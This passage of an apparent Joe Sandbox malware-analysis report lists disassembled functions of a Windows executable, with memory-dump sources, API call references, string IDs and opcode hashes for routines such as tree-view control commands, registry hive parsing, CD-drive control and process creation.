                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                            • Opcode ID: c68fdea4362489eb04e401625a38dcf39393b5d5dd9aacd805c1cd3f1ced1bd0
                                                                                                                                                                                                                                                                            • Instruction ID: 4ecb2ded3bbe44551e77adcf53f045a68c57825461891f5cdbd5a9b347def8d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c68fdea4362489eb04e401625a38dcf39393b5d5dd9aacd805c1cd3f1ced1bd0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAE1A2756043018FCB14EF25C45186AB7E6FF94318F18495DF8A69B3A2DB30EE4ACB85
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                            • Opcode ID: f742fb0f2d45718e1fcb0513c7ea080b8319544e536d926ac5771c7d92d25b0a
                                                                                                                                                                                                                                                                            • Instruction ID: f94bfbd7e796a3a205b1b389292524cffa120379b593e0193df9fc1232dd821c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f742fb0f2d45718e1fcb0513c7ea080b8319544e536d926ac5771c7d92d25b0a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7071F9B260012A8BCF109E7CC9515FB33B5AF60768F258524F87FA7294EA35DE85D390
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88DB5
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88DC9
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88DEC
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C88E0F
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C88E4D
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C86691), ref: 00C88EA9
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88EE2
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C88F25
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C88F5C
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C88F68
                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C88F78
                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00C86691), ref: 00C88F87
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C88FA4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C88FB0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                            • Opcode ID: 36ec1a5dc23352ac29a14b1fb9fe725f0d832fc3c5a106c3786b64e6abcf206e
                                                                                                                                                                                                                                                                            • Instruction ID: 60745e876c4f701ac46c2c88087b840d0e1bc0216cd7ed15a3f3059a0bd252ec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36ec1a5dc23352ac29a14b1fb9fe725f0d832fc3c5a106c3786b64e6abcf206e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE612371900219BEEB14EFA4CC41BFE77A8BF09B14F504106FA25D60D0DB74AA88DBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C6493D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C64948
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C6499F
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C649DD
                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00C64A1B
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C64A63
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C64A9E
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C64ACC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                            • Opcode ID: 61c599691b8d8067b8b8de6db01ed1d301dddc2fd4b2b5bae96dab74de971f2d
                                                                                                                                                                                                                                                                            • Instruction ID: c91f5238a2e7c7c78d1f20d144801c940e7dbcd12d28ce446ffb6ddf9c30f517
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61c599691b8d8067b8b8de6db01ed1d301dddc2fd4b2b5bae96dab74de971f2d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0171E3725082059FC724EF24C88097FB7E8EF94758F00496DF8A697262EB31DE49CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00C56395
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C563A7
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C563BE
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C563D3
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C563D9
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C563E9
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C563EF
                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C56410
                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C5642A
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C56433
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5649A
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00C564D6
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C564DC
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C564E3
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C5653A
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C56547
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C5656C
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C56596
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                            • Opcode ID: b96f5eea6fa42dee57d482106851ef67b8a6f65e387e63faf30e4ed5aa1082b5
                                                                                                                                                                                                                                                                            • Instruction ID: d0dd2edcc53bdb228364b62aa860b300b3ef1dc989a789caddfa477b16bad144
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b96f5eea6fa42dee57d482106851ef67b8a6f65e387e63faf30e4ed5aa1082b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1071B235900709AFDB20DFA8CE45BAEBBF5FF08705F500918E596A35A0D771EA84CB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00C70884
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00C7088F
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00C7089A
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00C708A5
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00C708B0
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00C708BB
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00C708C6
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00C708D1
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00C708DC
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00C708E7
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00C708F2
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00C708FD
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00C70908
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00C70913
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00C7091E
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00C70929
                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00C70939
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C7097B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C10436
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00CC170C,00000FA0,C97470E6,?,?,?,?,00C32733,000000FF), ref: 00C1048C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C32733,000000FF), ref: 00C10497
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C32733,000000FF), ref: 00C104A8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C104BE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C104CC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C104DA
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C10505
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C10510
                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00C10457
                                                                                                                                                                                                                                                                              • Part of subcall function 00C10413: __onexit.LIBCMT ref: 00C10419
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 00C104C4
                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C10492
                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 00C104B8
                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 00C104D2
                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 00C104A3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                            • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00C8DCD0), ref: 00C64F6C
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C64F80
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C64FDE
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C65039
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C65084
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C650EC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FD52: _wcslen.LIBCMT ref: 00C0FD5D
                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00CB7C10,00000061), ref: 00C65188
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BBF8
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC10
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC34
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BC60
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC74
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC96
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BD92
                                                                                                                                                                                                                                                                              • Part of subcall function 00C60F4E: GetStdHandle.KERNEL32(000000F6), ref: 00C60F6D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BDAB
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BDC6
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7BE16
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C7BE67
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C7BE99
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7BEAA
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7BEBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7BECE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C7BF43
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                            • Opcode ID: ecd3406a32ef3379e727b11b1cf317644953c83945e42769f5415bb46700d220
                                                                                                                                                                                                                                                                            • Instruction ID: 175f3073f23075340a676b9d9953d952136d96c4efd7db0a21b00302ea90886c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd3406a32ef3379e727b11b1cf317644953c83945e42769f5415bb46700d220
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F1BF316043049FC715EF24C891B6EBBE1BF85314F18895DF99A8B2A2CB70ED45CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C8DCD0), ref: 00C74B18
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C74B2A
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00C8DCD0), ref: 00C74B4F
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00C8DCD0), ref: 00C74B9B
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,00C8DCD0), ref: 00C74C05
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00C74CBF
                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C74D25
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C74D4F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                            • Opcode ID: fa41725991f43edc3181d17e03a56de77277cc976f15c115c9ecfea884d26291
                                                                                                                                                                                                                                                                            • Instruction ID: ea77baeb814094e205b4d92428c742b9dc0b1d528579922fd830d9d2cad6ea37
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa41725991f43edc3181d17e03a56de77277cc976f15c115c9ecfea884d26291
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78120A71A00119EFDB19DF94C888EAEBBB5FF45314F24C098E9199B251D731EE46CBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CC29C0), ref: 00C33F72
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CC29C0), ref: 00C34022
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C34066
                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00C3406F
                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00CC29C0,00000000,?,00000000,00000000,00000000), ref: 00C34082
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C3408E
